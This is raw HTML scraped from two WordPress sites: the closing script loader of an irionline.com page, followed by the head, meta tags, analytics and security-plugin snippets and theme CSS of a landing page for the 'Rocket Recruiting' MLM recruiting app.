</symbol> </defs> </svg> <script type='text/javascript'>/* <![CDATA[ */ var vars = {"rest_api_url":"https:\/\/irionline.com\/wp-json\/pvc\/v1"}; var hgMailchimpConfig = {"ajaxurl":"\/wp-admin\/admin-ajax.php","l10n":{"error":"Error:"}}; var zn_do_login = {"ajaxurl":"\/wp-admin\/admin-ajax.php","add_to_cart_text":"Item Added to cart!"}; var ZnThemeAjax = {"ajaxurl":"\/wp-admin\/admin-ajax.php","zn_back_text":"Back","zn_color_theme":"light","res_menu_trigger":"992","top_offset_tolerance":"","logout_url":"https:\/\/irionline.com\/wp-login.php?action=logout&redirect_to=https%3A%2F%2Firionline.com&_wpnonce=6e157f2ee2"}; (function(g,b,d){var c=b.head||b.getElementsByTagName("head"),D="readyState",E="onreadystatechange",F="DOMContentLoaded",G="addEventListener",H=setTimeout;function f(){$LAB.script("https://irionline.com/wp-includes/js/jquery/jquery.js").wait().script("https://irionline.com/wp-includes/js/jquery/jquery-migrate.min.js").wait().script("https://irionline.com/wp-includes/js/underscore.min.js").wait().script("https://irionline.com/wp-includes/js/backbone.min.js").wait().script("https://irionline.com/wp-content/plugins/page-views-count/assets/js/pvc.backbone.min.js").script("https://irionline.com/wp-content/themes/kallyas-child/js/helpers.js").script("https://code.jquery.com/ui/1.12.0/jquery-ui.min.js").script("https://irionline.com/wp-content/themes/kallyas/framework/hogash-mailchimp/assets/js/hg-mailchimp.js").script("https://irionline.com/wp-content/themes/kallyas/js/plugins.min.js").wait().script("https://irionline.com/wp-content/themes/kallyas/addons/scrollmagic/scrollmagic.js").script("https://irionline.com/wp-content/themes/kallyas/js/znscript.min.js").script("https://irionline.com/wp-content/themes/kallyas/addons/slick/slick.min.js").script("https://irionline.com/wp-content/themes/kallyas/framework/zion-builder/dist/znpb_frontend.bundle.js").script("https://irionline.com/wp-includes/js/wp-embed.min.js");}H(function(){if("item"in c){if(!c[0]){H(arguments.callee,25);return}c=c[0]}var a=b.createElement("script"),e=false;a.onload=a[E]=function(){if((a[D]&&a[D]!=="complete"&&a[D]!=="loaded")||e){return false}a.onload=a[E]=null;e=true;f()};a.src="https://irionline.com/wp-content/plugins/wp-deferred-javascripts/assets/js/lab.min.js?ver=2.0.3";c.insertBefore(a,c.firstChild)},0);if(b[D]==null&&b[G]){b[D]="loading";b[G](F,d=function(){b.removeEventListener(F,d,false);b[D]="complete"},false)}})(this,document); /* ]]> */</script></body> </html>
0
<!DOCTYPE HTML> <html class="" lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <title>Rocket Recruiting - Voted #1 MLM Recruiting App</title> <!-- Google Tag Manager for WordPress by gtm4wp.com --> <script data-cfasync="false" type="text/javascript">//<![CDATA[ var gtm4wp_datalayer_name = "dataLayer"; var dataLayer = dataLayer || []; //]]> </script> <!-- End Google Tag Manager for WordPress by gtm4wp.com --> <!-- This site is optimized with the Yoast SEO plugin v9.3 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Voted #1 MLM Recruiting app - BECOME A TOP RECRUITER WITH ZERO REJECTION BY GETTING PROSPECTS TO ASK YOU ABOUT YOUR BUSINESS"/> <link rel="canonical" href="http://rocketrecruitingapp.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Rocket Recruiting - Voted #1 MLM Recruiting App" /> <meta property="og:description" content="Voted #1 MLM Recruiting app - BECOME A TOP RECRUITER WITH ZERO REJECTION BY GETTING PROSPECTS TO ASK YOU ABOUT YOUR BUSINESS" /> <meta property="og:url" content="http://rocketrecruitingapp.com/" /> <meta property="og:site_name" content="Rocket Recruiting System " /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Voted #1 MLM Recruiting app - BECOME A TOP RECRUITER WITH ZERO REJECTION BY GETTING PROSPECTS TO ASK YOU ABOUT YOUR BUSINESS" /> <meta name="twitter:title" content="Rocket Recruiting - Voted #1 MLM Recruiting App" /> <meta name="twitter:image" content="http://rocketrecruitingapp.com/wp-content/uploads/2013/05/rr_lander_header2.png" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"http://rocketrecruitingapp.com/#website","url":"http://rocketrecruitingapp.com/","name":"Rocket Recruiting System ","potentialAction":{"@type":"SearchAction","target":"http://rocketrecruitingapp.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//app.clickfunnels.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Rocket Recruiting System &raquo; Feed" href="http://rocketrecruitingapp.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Rocket Recruiting System &raquo; Comments Feed" href="http://rocketrecruitingapp.com/comments/feed/" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE"> <meta name="og:title" content="Home"> <meta name="og:type" content="website"> <meta name="og:url" content="http://rocketrecruitingapp.com/"> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/rocketrecruitingapp.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5f1e367b96afe88652670116fef58864"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://rocketrecruitingapp.com/wp-includes/css/dist/block-library/style.min.css?ver=5f1e367b96afe88652670116fef58864' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='http://rocketrecruitingapp.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.2.5.4' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style> <link rel='stylesheet' id='testimonial-rotator-style-css' href='http://rocketrecruitingapp.com/wp-content/plugins/testimonial-rotator/testimonial-rotator-style.css?ver=5f1e367b96afe88652670116fef58864' type='text/css' media='all' /> <link rel='stylesheet' id='us-font-1-css' href='http://fonts.googleapis.com/css?family=Oswald%3A400%2C700&#038;subset=latin&#038;ver=5f1e367b96afe88652670116fef58864' type='text/css' media='all' /> <link rel='stylesheet' id='us-base-css' href='//rocketrecruitingapp.com/wp-content/themes/Impreza/framework/css/us-base.css?ver=3.2.1' type='text/css' media='all' /> <link rel='stylesheet' id='us-font-awesome-css' href='//rocketrecruitingapp.com/wp-content/themes/Impreza/framework/css/font-awesome.css?ver=4.6.3' type='text/css' media='all' /> <link rel='stylesheet' id='us-font-mdfi-css' href='//rocketrecruitingapp.com/wp-content/themes/Impreza/framework/css/font-mdfi.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='us-style-css' href='//rocketrecruitingapp.com/wp-content/themes/Impreza/css/style.css?ver=3.2.1' type='text/css' media='all' /> <link rel='stylesheet' id='us-responsive-css' href='//rocketrecruitingapp.com/wp-content/themes/Impreza/css/responsive.css?ver=3.2.1' type='text/css' media='all' /> <link rel='stylesheet' id='theme-style-css' href='//rocketrecruitingapp.com/wp-content/themes/Impreza-child/style.css?ver=3.2.1' type='text/css' media='all' /> <link rel='stylesheet' id='bsf-Defaults-css' href='http://rocketrecruitingapp.com/wp-content/uploads/smile_fonts/Defaults/Defaults.css?ver=5f1e367b96afe88652670116fef58864' type='text/css' media='all' /> <link rel='stylesheet' id='ultimate-style-min-css' href='http://rocketrecruitingapp.com/wp-content/plugins/Ultimate_VC_Addons/assets/min-css/ultimate.min.css?ver=3.16.5' type='text/css' media='all' /> <script type='text/javascript' src='http://rocketrecruitingapp.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://rocketrecruitingapp.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://rocketrecruitingapp.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.2.5.4'></script> <script type='text/javascript' src='http://rocketrecruitingapp.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.2.5.4'></script> <script type='text/javascript' src='http://rocketrecruitingapp.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9'></script> <script type='text/javascript' src='http://rocketrecruitingapp.com/wp-content/plugins/testimonial-rotator/js/jquery.cycletwo.js?ver=5f1e367b96afe88652670116fef58864'></script> <script type='text/javascript' src='http://rocketrecruitingapp.com/wp-content/plugins/testimonial-rotator/js/jquery.cycletwo.addons.js?ver=5f1e367b96afe88652670116fef58864'></script> <script type='text/javascript' src='http://rocketrecruitingapp.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://rocketrecruitingapp.com/wp-content/plugins/Ultimate_VC_Addons/assets/min-js/ultimate.min.js?ver=3.16.5'></script> <link rel='https://api.w.org/' href='http://rocketrecruitingapp.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://rocketrecruitingapp.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://rocketrecruitingapp.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='http://rocketrecruitingapp.com/' /> <link rel="alternate" type="application/json+oembed" href="http://rocketrecruitingapp.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Frocketrecruitingapp.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://rocketrecruitingapp.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Frocketrecruitingapp.com%2F&#038;format=xml" /> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//rocketrecruitingapp.com/?wordfence_lh=1&hid=43FD32FC587DD1F438F1993595C4E6E1'); </script> <!-- Google Tag Manager for WordPress by gtm4wp.com --> <script data-cfasync="false" type="text/javascript">//<![CDATA[ dataLayer.push({"pagePostType":"frontpage","pagePostType2":"single-page","pagePostAuthor":"Eric Tippetts"});//]]> </script> <script data-cfasync="false">//<![CDATA[ (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= '//www.googletagmanager.com/gtm.'+'js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-MDVJC3G');//]]> </script> <!-- End Google Tag Manager --> <!-- End Google Tag Manager for WordPress by gtm4wp.com --><meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://rocketrecruitingapp.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE 8]><link rel="stylesheet" type="text/css" href="http://rocketrecruitingapp.com/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Slider Revolution 5.2.5.4 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1467535229371{padding-top: 250px !important;padding-bottom: 250px !important;}.vc_custom_1468032637237{padding-bottom: 30px !important;}.vc_custom_1517359945814{padding-bottom: 30px !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <style id='us-theme-options-css' type="text/css">body {font-family:"Oswald", sans-serif;font-size:18px;line-height:28px;font-weight:400;}.w-blog-post {font-size:18px;}.w-nav .menu-item-language,.w-nav-item {font-family:"Oswald", sans-serif;font-weight:400;}h1, h2, h3, h4, h5, h6,.w-blog-post.format-quote blockquote,.w-counter-number,.w-pricing-item-price,.w-tabs-item-title,.ult_price_figure,.ult_countdown-amount,.ultb3-box .ultb3-title,.stats-block .stats-desc .stats-number {font-family:"Oswald", sans-serif;font-weight:400;}h1 {font-size:60px;letter-spacing:-1px;}h2 {font-size:38px;letter-spacing:-1px;}h3 {font-size:26px;letter-spacing:0px;}h4,.widgettitle,.comment-reply-title,.woocommerce #reviews h2,.woocommerce .related > h2,.woocommerce .upsells > h2,.woocommerce .cross-sells > h2 {font-size:22px;letter-spacing:0px;}h5,.w-blog:not(.cols_1) .w-blog-list .w-blog-post-title {font-size:20px;letter-spacing:0px;}h6 {font-size:18px;letter-spacing:0px;}@media (max-width:767px) {body {font-size:16px;line-height:28px;}.w-blog-post {font-size:16px;}h1 {font-size:30px;}h2 {font-size:26px;}h3 {font-size:22px;}h4,.widgettitle,.comment-reply-title,.woocommerce #reviews h2,.woocommerce .related > h2,.woocommerce .upsells > h2,.woocommerce .cross-sells > h2 {font-size:20px;}h5 {font-size:18px;}h6 {font-size:16px;}}body,.header_hor .l-header.pos_fixed {min-width:1240px;}.l-canvas.type_boxed,.l-canvas.type_boxed .l-subheader,.l-canvas.type_boxed ~ .l-footer .l-subfooter {max-width:1240px;}.header_hor .l-subheader-h,.l-titlebar-h,.l-main-h,.l-section-h,.l-subfooter-h,.w-tabs-section-content-h,.w-blog-post-body {max-width:1140px;}.l-sidebar {width:25%;}.l-content {width:70%;}@media (max-width:768px) {.g-cols > div:not([class*="xs"]) {float:none;width:100%;margin:0 0 25px;}.g-cols > div:last-child,.g-cols > div.vc_col-has-fill {margin-bottom:0;}.g-cols.offset_none,.g-cols.offset_none > div {display:block !important;}}@media (min-width:901px) {.header_hor .l-subheader.at_top {line-height:36px;height:36px;}.header_hor .l-header.sticky .l-subheader.at_top {line-height:0px;height:0px;overflow:hidden;}.header_hor .l-subheader.at_middle {line-height:120px;height:120px;}.header_hor .l-header.sticky .l-subheader.at_middle {line-height:60px;height:60px;}.l-subheader.at_bottom { display:none; }.header_hor .l-subheader.at_bottom {line-height:36px;height:36px;}.header_hor .l-header.sticky .l-subheader.at_bottom {line-height:40px;height:40px;}.header_hor .l-header.pos_fixed ~ .l-titlebar,.header_hor .l-canvas.titlebar_none.sidebar_left .l-header.pos_fixed ~ .l-main,.header_hor .l-canvas.titlebar_none.sidebar_right .l-header.pos_fixed ~ .l-main,.header_hor .l-canvas.titlebar_none.sidebar_none .l-header.pos_fixed ~ .l-main .l-section:first-child,.header_hor .l-header.pos_static.bg_transparent ~ .l-titlebar,.header_hor .l-canvas.titlebar_none.sidebar_left .l-header.pos_static.bg_transparent ~ .l-main,.header_hor .l-canvas.titlebar_none.sidebar_right .l-header.pos_static.bg_transparent ~ .l-main,.header_hor .l-canvas.titlebar_none.sidebar_none .l-header.pos_static.bg_transparent ~ .l-main .l-section:first-child {padding-top:156px;}.header_hor .l-header.pos_static.bg_solid + .l-main .l-section.preview_trendy .w-blog-post-preview {top:-156px;}.header_ver {padding-left:300px;position:relative;}.rtl.header_ver {padding-left:0;padding-right:300px;}.header_ver .l-header,.header_ver .l-header .w-cart-notification {width:300px;}.header_ver .l-navigation-item.to_next {left:100px;}.no-touch .header_ver .l-navigation-item.to_next:hover {left:300px;}.rtl.header_ver .l-navigation-item.to_next {right:100px;}.no-touch .rtl.header_ver .l-navigation-item.to_next:hover {right:300px;}.header_ver .w-nav.type_desktop [class*="columns"] .w-nav-list.level_2 {width:calc(100vw - 300px);max-width:980px;}}@media (min-width:601px) and (max-width:900px) {.header_hor .l-subheader.at_top {line-height:36px;height:36px;}.header_hor .l-header.sticky .l-subheader.at_top {line-height:0px;height:0px;overflow:hidden;}.header_hor .l-subheader.at_middle {line-height:80px;height:80px;}.header_hor .l-header.sticky .l-subheader.at_middle {line-height:60px;height:60px;}.l-subheader.at_bottom { display:none; }.header_hor .l-subheader.at_bottom {line-height:50px;height:50px;}.header_hor .l-header.sticky .l-subheader.at_bottom {line-height:50px;height:50px;}.header_hor .l-header.pos_fixed ~ .l-titlebar,.header_hor .l-canvas.titlebar_none.sidebar_left .l-header.pos_fixed ~ .l-main,.header_hor .l-canvas.titlebar_none.sidebar_right .l-header.pos_fixed ~ .l-main,.header_hor .l-canvas.titlebar_none.sidebar_none .l-header.pos_fixed ~ .l-main .l-section:first-child,.header_hor .l-header.pos_static.bg_transparent ~ .l-titlebar,.header_hor .l-canvas.titlebar_none.sidebar_left .l-header.pos_static.bg_transparent ~ .l-main,.header_hor .l-canvas.titlebar_none.sidebar_right .l-header.pos_static.bg_transparent ~ .l-main,.header_hor .l-canvas.titlebar_none.sidebar_none .l-header.pos_static.bg_transparent ~ .l-main .l-section:first-child {padding-top:116px;}.header_hor .l-header.pos_static.bg_solid + .l-main .l-section.preview_trendy .w-blog-post-preview {top:-116px;}.header_ver .l-header {width:300px;}}@media (max-width:600px) {.l-subheader.at_top { display:none; }.header_hor .l-subheader.at_top {line-height:36px;height:36px;}.header_hor .l-header.sticky .l-subheader.at_top {line-height:0px;height:0px;overflow:hidden;}.header_hor .l-subheader.at_middle {line-height:50px;height:50px;}.header_hor .l-header.sticky .l-subheader.at_middle {line-height:50px;height:50px;}.l-subheader.at_bottom { display:none; }.header_hor .l-subheader.at_bottom {line-height:50px;height:50px;}.header_hor .l-header.sticky .l-subheader.at_bottom {line-height:50px;height:50px;}.header_hor .l-header.pos_fixed ~ .l-titlebar,.header_hor .l-canvas.titlebar_none.sidebar_left .l-header.pos_fixed ~ .l-main,.header_hor .l-canvas.titlebar_none.sidebar_right .l-header.pos_fixed ~ .l-main,.header_hor .l-canvas.titlebar_none.sidebar_none .l-header.pos_fixed ~ .l-main .l-section:first-child,.header_hor .l-header.pos_static.bg_transparent ~ .l-titlebar,.header_hor .l-canvas.titlebar_none.sidebar_left .l-header.pos_static.bg_transparent ~ .l-main,.header_hor .l-canvas.titlebar_none.sidebar_right .l-header.pos_static.bg_transparent ~ .l-main,.header_hor .l-canvas.titlebar_none.sidebar_none .l-header.pos_static.bg_transparent ~ .l-main .l-section:first-child {padding-top:50px;}.header_hor .l-header.pos_static.bg_solid + .l-main .l-section.preview_trendy .w-blog-post-preview {top:-50px;}}@media (min-width:901px) {.ush_image_1 { height:100px; }.l-header.sticky .ush_image_1 { height:75px; }}@media (min-width:601px) and (max-width:900px) {.ush_image_1 { height:50px; }.l-header.sticky .ush_image_1 { height:50px; }}@media (max-width:600px) {.ush_image_1 { height:50px; }.l-header.sticky .ush_image_1 { height:50px; }}.ush_text_1 .w-text-value { color:; }@media (min-width:901px) {.ush_text_1 { font-size:27px; }}@media (min-width:601px) and (max-width:900px) {.ush_text_1 { font-size:24px; }}@media (max-width:600px) {.ush_text_1 { font-size:20px; }}.ush_text_1 { white-space:nowrap; }.ush_text_2 .w-text-value { color:; }@media (min-width:901px) {.ush_text_2 { font-size:13px; }}@media (min-width:601px) and (max-width:900px) {.ush_text_2 { font-size:13px; }}@media (max-width:600px) {.ush_text_2 { font-size:13px; }}.ush_text_2 { white-space:nowrap; }.ush_text_3 .w-text-value { color:; }@media (min-width:901px) {.ush_text_3 { font-size:13px; }}@media (min-width:601px) and (max-width:900px) {.ush_text_3 { font-size:13px; }}@media (max-width:600px) {.ush_text_3 { font-size:13px; }}.ush_text_3 { white-space:nowrap; }.ush_text_4 .w-text-value { color:; }@media (min-width:901px) {.ush_text_4 { font-size:13px; }}@media (min-width:601px) and (max-width:900px) {.ush_text_4 { font-size:13px; }}@media (max-width:600px) {.ush_text_4 { font-size:13px; }}.ush_text_4 { white-space:nowrap; }.header_hor .ush_menu_1.type_desktop .w-nav-list.level_1 > .menu-item > a {padding:0 20px;}.header_ver .ush_menu_1.type_desktop {line-height:40px;}.ush_menu_1.type_desktop .btn.w-nav-item.level_1 > .w-nav-anchor {margin:10px;}.ush_menu_1.type_desktop .w-nav-list.level_1 > .menu-item > a,.ush_menu_1.type_desktop [class*="columns"] .menu-item-has-children .w-nav-anchor.level_2 {font-size:16px;}.ush_menu_1.type_desktop .submenu-languages .menu-item-language > a,.ush_menu_1.type_desktop .w-nav-anchor:not(.level_1) {font-size:15px;}.ush_menu_1.type_mobile .w-nav-anchor.level_1 {font-size:15px;}.ush_menu_1.type_mobile .menu-item-language > a,.ush_menu_1.type_mobile .w-nav-anchor:not(.level_1) {font-size:14px;}@media (min-width:901px) {.ush_search_1.layout_simple {max-width:240px;}.ush_search_1.layout_modern.active {width:240px;}}@media (min-width:601px) and (max-width:900px) {.ush_search_1.layout_simple {max-width:200px;}.ush_search_1.layout_modern.active {width:200px;}}@media (min-width:901px) {.ush_socials_1 {font-size:18px;}}@media (min-width:601px) and (max-width:900px) {.ush_socials_1 {font-size:18px;}}@media (max-width:600px) {.ush_socials_1 {font-size:18px;}}.ush_socials_1 .custom .w-socials-item-link-hover {background-color:#1abc9c;}.ush_socials_1.style_colored .custom .w-socials-item-link {color:#1abc9c;}@media (min-width:901px) {.ush_dropdown_1 .w-dropdown-h {font-size:13px;}}@media (min-width:601px) and (max-width:900px) {.ush_dropdown_1 .w-dropdown-h {font-size:13px;}}@media (max-width:600px) {.ush_dropdown_1 .w-dropdown-h {font-size:13px;}}@media (min-width:901px) {.ush_cart_1 .w-cart-link {font-size:20px;}}@media (min-width:601px) and (max-width:900px) {.ush_cart_1 .w-cart-link {font-size:20px;}}@media (max-width:600px) {.ush_cart_1 .w-cart-link {font-size:20px;}}body {background-color:#111111;}.l-subheader.at_top,.l-subheader.at_top .w-dropdown-list,.header_hor .l-subheader.at_top .type_mobile .w-nav-list.level_1 {background-color:#ff0000;}.l-subheader.at_top,.l-subheader.at_top .w-dropdown.active,.header_hor .l-subheader.at_top .type_mobile .w-nav-list.level_1 {color:#ffffff;}.no-touch .l-subheader.at_top a:hover,.no-touch .l-subheader.at_top .w-cart-quantity,.no-touch .l-header.bg_transparent .l-subheader.at_top .w-dropdown.active a:hover {color:#ffffff;}.header_ver .l-header,.header_hor .l-subheader.at_middle,.l-subheader.at_middle .w-dropdown-list,.header_hor .l-subheader.at_middle .type_mobile .w-nav-list.level_1 {background-color:#ffffff;}.l-subheader.at_middle,.l-subheader.at_middle .w-dropdown.active,.header_hor .l-subheader.at_middle .type_mobile .w-nav-list.level_1 {color:#444444;}.no-touch .l-subheader.at_middle a:hover,.no-touch .l-subheader.at_middle .w-cart-quantity,.no-touch .l-header.bg_transparent .l-subheader.at_middle .w-dropdown.active a:hover {color:#ff0000;}.l-subheader.at_bottom,.l-subheader.at_bottom .w-dropdown-list,.header_hor .l-subheader.at_bottom .type_mobile .w-nav-list.level_1 {background-color:#ff0000;}.l-subheader.at_bottom,.l-subheader.at_bottom .w-dropdown.active,.header_hor .l-subheader.at_bottom .type_mobile .w-nav-list.level_1 {color:#ffffff;}.no-touch .l-subheader.at_bottom a:hover,.no-touch .l-subheader.at_bottom .w-cart-quantity,.no-touch .l-header.bg_transparent .l-subheader.at_bottom .w-dropdown.active a:hover {color:#ffffff;}.l-header.bg_transparent:not(.sticky) .l-subheader {color:#ffffff;}.no-touch .l-header.bg_transparent:not(.sticky) a:not(.w-nav-anchor):hover,.no-touch .l-header.bg_transparent:not(.sticky) .type_desktop .menu-item-language > a:hover,.no-touch .l-header.bg_transparent:not(.sticky) .type_desktop .menu-item-language:hover > a,.no-touch .l-header.bg_transparent:not(.sticky) .type_desktop .w-nav-item.level_1:hover > .w-nav-anchor {color:#ffffff;}.l-header.bg_transparent:not(.sticky) .w-nav-title:after {background-color:#ffffff;}.w-search-form {background-color:#111111;color:#ffffff;}.w-search.layout_fullscreen .w-search-form:before {background-color:#111111;}.no-touch .w-nav.type_desktop .menu-item-language:hover > a,.no-touch .w-nav-item.level_1:hover > .w-nav-anchor {background-color:#ff0000;color:#ffffff;}.w-nav-title:after {background-color:#ffffff;}.w-nav-item.level_1.current-menu-item > .w-nav-anchor,.w-nav-item.level_1.current-menu-parent > .w-nav-anchor,.w-nav-item.level_1.current-menu-ancestor > .w-nav-anchor {background-color:;color:#ff0000;}.l-header.bg_transparent:not(.sticky) .type_desktop .w-nav-item.level_1.current-menu-item > .w-nav-anchor,.l-header.bg_transparent:not(.sticky) .type_desktop .w-nav-item.level_1.current-menu-ancestor > .w-nav-anchor {color:#ffffff;}.w-nav.type_desktop .submenu-languages,.w-nav-list:not(.level_1) {background-color:#ffffff;color:#444444;}.no-touch .w-nav.type_desktop .submenu-languages .menu-item-language:hover > a,.no-touch .w-nav-item:not(.level_1):hover > .w-nav-anchor {background-color:#111111;color:#ffffff;}.w-nav-item:not(.level_1).current-menu-item > .w-nav-anchor,.w-nav-item:not(.level_1).current-menu-parent > .w-nav-anchor,.w-nav-item:not(.level_1).current-menu-ancestor > .w-nav-anchor {background-color:;color:#ff0000;}.btn.w-menu-item,.btn.w-nav-item .w-nav-anchor.level_1 {background-color:#ff0000 !important;color:#ffffff !important;}.no-touch .btn.w-menu-item:hover,.no-touch .btn.w-nav-item .w-nav-anchor.level_1:before {background-color:#000000 !important;}.no-touch .btn.w-menu-item:hover,.no-touch .btn.w-nav-item .w-nav-anchor.level_1:hover {color:#ffffff !important;}.l-preloader,.l-canvas,.w-blog.layout_masonry .w-blog-post-h,.w-blog.layout_cards .w-blog-post-h,.w-cart-dropdown,.g-filters.style_1 .g-filters-item.active,.no-touch .g-filters-item.active:hover,.w-tabs.layout_default .w-tabs-item.active,.w-tabs.layout_ver .w-tabs-item.active,.no-touch .w-tabs.layout_default .w-tabs-item.active:hover,.no-touch .w-tabs.layout_ver .w-tabs-item.active:hover,.w-tabs.layout_timeline .w-tabs-item,.w-tabs.layout_timeline .w-tabs-section-header-h,.no-touch #lang_sel ul ul a:hover,.no-touch #lang_sel_click ul ul a:hover,#lang_sel_footer,.woocommerce-tabs .tabs li.active,.no-touch .woocommerce-tabs .tabs li.active:hover,.woocommerce .stars span:after,.woocommerce .stars span a:after,.woocommerce #payment .payment_box input[type="text"],#bbp-user-navigation li.current,.gform_wrapper .chosen-container-single .chosen-search input[type="text"],.gform_wrapper .chosen-container-multi .chosen-choices li.search-choice {background-color:#ffffff;}.woocommerce .blockUI.blockOverlay {background-color:#ffffff !important;}.w-tabs.layout_modern .w-tabs-item:after {border-bottom-color:#ffffff;}a.w-btn.color_contrast,.w-btn.color_contrast,.no-touch a.w-btn.color_contrast:hover,.no-touch .w-btn.color_contrast:hover,.no-touch a.w-btn.color_contrast.style_outlined:hover,.no-touch .w-btn.color_contrast.style_outlined:hover,.w-iconbox.style_circle.color_contrast .w-iconbox-icon,.tribe-events-calendar thead th {color:#ffffff;}input,textarea,select,.l-section.for_blogpost .w-blog-post-preview,.w-actionbox.color_light,.g-filters.style_1,.g-filters.style_2 .g-filters-item.active,.w-iconbox.style_circle.color_light .w-iconbox-icon,.g-loadmore-btn,.w-pricing-item-header,.w-progbar-bar,.w-progbar.style_3 